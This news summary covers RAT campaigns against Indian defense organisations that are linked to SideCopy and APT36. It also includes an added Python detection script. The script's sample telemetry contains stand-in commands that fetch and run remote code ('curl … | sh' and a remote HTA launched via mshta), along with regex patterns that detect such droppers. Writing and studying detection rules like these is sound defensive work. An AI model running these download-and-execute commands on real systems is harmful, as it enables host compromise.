Multiple campaigns targeted Indian defense and government-aligned organizations in late 2025 and early 2026 and used remote access trojans to compromise Windows and Linux environments, a blog post by Aryaka said.
KEY FACTS
- Incident: Multiple targeted campaigns against Indian defense and government-aligned organizations
- Timing: Activity observed in late 2025 and early 2026
- Malware: Geta RAT, Ares RAT and DeskRAT used to provide remote access
- Delivery: Phishing lures with malicious LNK, ELF and PowerPoint Add-In files
One common Windows chain begins with a malicious LNK file that invokes mshta.exe to run an HTA hosted on compromised domains. The HTA contains JavaScript that decrypts and loads a DLL. The DLL processes an embedded blob to write a decoy PDF to disk, connect to a hard-coded command-and-control server and display the decoy.
After the lure is displayed the malware checks for installed security products and adapts its persistence method before deploying Geta RAT on the host. Geta RAT provides persistent remote access and supports commands to collect system information, enumerate and kill processes, list installed applications, harvest credentials, replace clipboard contents, capture screenshots, perform file operations and execute shell commands.
Parallel Linux activity starts with a Go binary that drops a Python-based Ares RAT by running a shell script downloaded from an external server. A separate campaign uses a rogue PowerPoint Add-In with an embedded macro that fetches a Golang malware called DeskRAT.
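The Windows chain (LNK launching mshta.exe against a remote HTA) and the Linux chain (a dropper binary running a downloaded shell script that stages a Python payload) both leave a recognisable parent/child process shape in endpoint telemetry. The following is an added detection example written for this summary, not code from Aryaka or from the reported campaigns: it runs three simple rules over constructed process-creation events. All hostnames, paths and URLs in it are made up for illustration and are not indicators from the report.

```python
"""Added example: flag process-creation events that match the delivery chains
described above. Event data, hostnames and URLs are constructed, not real IoCs."""
import re
from dataclasses import dataclass
from typing import List, Optional

SHELLS = {"sh", "bash", "dash"}
# User-facing parents from which a shortcut or document lure typically launches
USER_FACING_PARENTS = {"explorer.exe", "winword.exe", "powerpnt.exe", "excel.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class ProcEvent:
    host: str
    parent: str   # parent image name
    image: str    # child image name
    cmdline: str


@dataclass
class Finding:
    host: str
    rule: str
    cmdline: str


def check_windows_hta(ev: ProcEvent) -> Optional[Finding]:
    """mshta.exe started from a user-facing parent with a remote URL argument:
    the shape produced when an LNK lure pulls an HTA from a web server."""
    if ev.image.lower() != "mshta.exe":
        return None
    if URL_RE.search(ev.cmdline) and ev.parent.lower() in USER_FACING_PARENTS:
        return Finding(ev.host, "mshta_remote_hta", ev.cmdline)
    return None


def check_linux_dropper(ev: ProcEvent) -> Optional[Finding]:
    """A shell spawned by a non-shell parent that either pipes a download into
    a shell or runs a script from a world-writable staging directory."""
    if ev.image not in SHELLS or ev.parent in SHELLS:
        return None
    pipe_to_shell = re.search(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b", ev.cmdline)
    staged_script = re.search(r"\b(sh|bash)\s+/(tmp|dev/shm)/\S+\.sh\b", ev.cmdline)
    if pipe_to_shell or staged_script:
        return Finding(ev.host, "shell_script_dropper", ev.cmdline)
    return None


def check_tmp_python(ev: ProcEvent) -> Optional[Finding]:
    """A Python interpreter launched by a shell on a script under /tmp or
    /dev/shm, the final step of a script-based RAT being staged."""
    if ev.image not in {"python", "python3"} or ev.parent not in SHELLS:
        return None
    if re.search(r"\s/(tmp|dev/shm)/\S+\.py\b", ev.cmdline):
        return Finding(ev.host, "tmp_python_payload", ev.cmdline)
    return None


RULES = (check_windows_hta, check_linux_dropper, check_tmp_python)


def scan(events: List[ProcEvent]) -> List[Finding]:
    """Apply every rule to every event and return the findings in event order."""
    findings = []
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


# Constructed sample telemetry (hypothetical hosts, domains and paths).
SAMPLE_EVENTS = [
    ProcEvent("WS01", "explorer.exe", "mshta.exe",
              "mshta.exe https://docs.example.invalid/notice.hta"),
    ProcEvent("WS01", "explorer.exe", "notepad.exe", "notepad.exe readme.txt"),
    ProcEvent("WS02", "svchost.exe", "mshta.exe",
              "mshta.exe C:\\Windows\\Temp\\local.hta"),          # benign: no URL
    ProcEvent("srv-lin1", "updater", "sh",
              "sh -c 'curl -s http://files.example.invalid/setup.sh | sh'"),
    ProcEvent("srv-lin1", "sh", "python3", "python3 /tmp/.cache/agent.py"),
    ProcEvent("srv-lin1", "cron", "sh", "sh /etc/cron.daily/logrotate"),  # benign
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule}: {f.cmdline}")
```

The rules deliberately key on process lineage rather than on file hashes or domains, since the report notes the actors rotate lures and use regionally trusted infrastructure; a hash- or domain-based rule would age quickly, while "mshta.exe with a URL argument under explorer.exe" or "a shell piping curl into sh from a non-shell parent" survives infrastructure changes.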
The campaigns use defense themed lures, impersonated official documents and regionally trusted infrastructure. The malware families and operational patterns align with clusters tracked as SideCopy and APT36, and SideCopy has been active since at least 2019.
WHY IT MATTERS
The combination of cross-platform trojans, memory-resident techniques and trusted regional lures increases the risk of prolonged access and data theft for targeted defense and policy organizations.